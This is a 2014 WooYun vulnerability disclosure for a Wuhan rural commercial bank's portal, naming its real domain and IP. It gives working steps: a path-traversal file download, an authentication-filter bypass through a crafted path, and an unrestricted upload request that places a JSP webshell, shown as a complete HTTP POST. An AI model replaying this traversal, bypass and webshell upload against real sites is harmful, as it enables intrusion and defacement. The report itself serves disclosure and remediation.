当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-080996

漏洞标题:武汉市农村商业银行门户网站多处漏洞

相关厂商:武汉市农村商业银行

漏洞作者: cyber_jt

提交时间:2014-10-27 17:46

修复时间:2014-12-11 17:48

公开时间:2014-12-11 17:48

漏洞类型:文件上传导致任意代码执行

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-10-27: 细节已通知厂商并且等待厂商处理中
2014-10-31: 厂商已经确认,细节仅向厂商公开
2014-11-10: 细节向核心白帽子及相关领域专家公开
2014-11-20: 细节向普通白帽子公开
2014-11-30: 细节向实习白帽子公开
2014-12-11: 细节向公众公开

简要描述:

武汉市农村商业银行门户网站存在多处漏洞可GetShell,可篡改网站信息。

详细说明:

武汉市农村商业银行门户网站:http://www.whrcbank.com、http://202.103.25.14:8081/whrcbank,其中http://www.whrcbank.com是反向代理服务器。目标网站存在多处安全漏洞,如下:
1.目录浏览
http://www.whrcbank.com/upload/
2.任意文件下载:
http://www.whrcbank.com/downLoad?fileName=../WEB-INF/web.xml
3.任意类型文件上传
通过下载漏洞找到上传地址~/background/down/adddown

<servlet>
	<servlet-name>addDownController</servlet-name>
    <servlet-class>com.jetsum.down.addDownServlet</servlet-class>
  </servlet>
  <servlet-mapping>
	<servlet-name>addDownController</servlet-name>
	<url-pattern>/background/down/adddown</url-pattern>
  </servlet-mapping>


对应的类addDownServlet中:

...
      SmartUpload mySmartUpload = new SmartUpload();
      JspFactory factory = JspFactory.getDefaultFactory();
      PageContext pageContext = factory.getPageContext(this, request, response, null, false, -1, true);
      mySmartUpload.initialize(pageContext);
      mySmartUpload.setTotalMaxFileSize(524288000L);
      mySmartUpload.upload();
      File files = mySmartUpload.getFiles().getFile(0);
      file = files.getFileExt();
      number = String.valueOf(files.getSize());
      url = toChinese.toChinese(files.getFileName());
      String path = getServletContext().getRealPath("/");
      String newFileName = TypeInfo.generalSrid();
      url = newFileName + "." + file;
      File myFile = null;
      if (mySmartUpload.getFiles() != null) {
        myFile = mySmartUpload.getFiles().getFile(0);
        myFile.saveAs(path + "/upload/" + url);
      }
...


从这个过程可知对上传文件类型没有任何限制,可以上传jsp文件获得WebShell。
4.绕过过滤器检验
要通过2实现上传文件,还需要通过过滤器logincheckfilter的验证。

<filter>
<filter-name>logincheckfilter</filter-name>
<filter-class>bookstore.servlet.LoginCheckFilter</filter-class>
</filter>
<filter-mapping>
<filter-name>logincheckfilter</filter-name>
<url-pattern>/background/*</url-pattern>
</filter-mapping>
<filter>


在类LoginCheckFilter中:

public void doFilter(ServletRequest request, ServletResponse response, FilterChain filterChain)
  {
    try
    {
      HttpServletRequest httpRequest = (HttpServletRequest)request;
      HttpServletResponse httpResponse = (HttpServletResponse)response;
      boolean isValid = false;
      String hURLStr = httpRequest.getRequestURI();
      String uriStr = "";
      String uriStrU = "";
      String webStr = "";
      uriStrU = hURLStr.toUpperCase();
      uriStr = uriStrU.substring(uriStrU.length() - 10, uriStrU.length());
      if (hURLStr.length() > 46)
      {
        webStr = uriStrU.substring(uriStrU.length() - 33, uriStrU.length() - 21);
      }
      if ((uriStr.endsWith("BACKGROUND")) || (uriStr.equals("/LOGIN.JSP")) || (httpRequest.getSession
().getAttribute("username") != null)) {
        isValid = true;
      }
      if (webStr.equals("/UPLOADFILE/"))
      {
        isValid = true;
      }
      if (isValid) {
        filterChain.doFilter(request, response); return;
      }
      httpResponse.sendRedirect("../loginerror.jsp");
    }
    catch (ServletException sx)
    {
      this.filterConfig.getServletContext().log(sx.getMessage());
    }
    catch (IOException iox) {
      this.filterConfig.getServletContext().log(iox.getMessage());
    }
  }


当webStr.equals("/UPLOADFILE/")成立时会通过验证,因此只要把上传提交地址~/background/down/adddown变换为~/background////uploadfile/.././././down/adddown就可以通过这个验证了。这里只能使用http://202.103.25.14:8081/whrcbank,不能用http://www.whrcbank.com,因为反向代理服务器会把~/background////uploadfile/.././././down/adddown转换成/background////down/adddown发送到WEB服务器上,也就失去绕过的能力了。
5.综上:

POST /whrcbank/background////uploadfile/.././././down/adddown HTTP/1.1
Host: 202.103.25.14:8081
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------151752906420650
Content-Length: 245
-----------------------------151752906420650
Content-Disposition: form-data; name="newFile"; filename="test.jsp"
Content-Type: application/octet-stream
<%="hello world!"%>
-----------------------------151752906420650--

漏洞证明:

http://www.whrcbank.com/upload/201410271541530055.jsp

0915.jpg


如果攻击者对这个地方的链接地址进行篡改,可能会造成比较重大的影响:

0350.jpg

修复方案:

漏洞细节比较简单明白,不多细说。
很多企业单位对托管后的门户网站安全重要性认识不足。门户网站之所以在企业信息安全具有重要地位在于它不止是否是企业网络链路上的节点,还在于它是企业业务逻辑上的门户。门户网站上通常发布着企业最基本信息,比如企业邮件系统的链接地址、VPN登录链接地址、客户端程序的下载等等,门户网站使用者对其信息是高度信任的,如果这些最基本的信息被篡改,无疑会产生较为深远的影响。笔者最近看过一个渗透测试项目,测试者就是通过某大企业托管在外门户网站漏洞,最后实现对企业内网中大量重要系统的渗透。希望企业单位加强对这方面的重视。

版权声明:转载请注明来源 cyber_jt@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2014-10-31 17:59

厂商回复:

最新状态:

暂无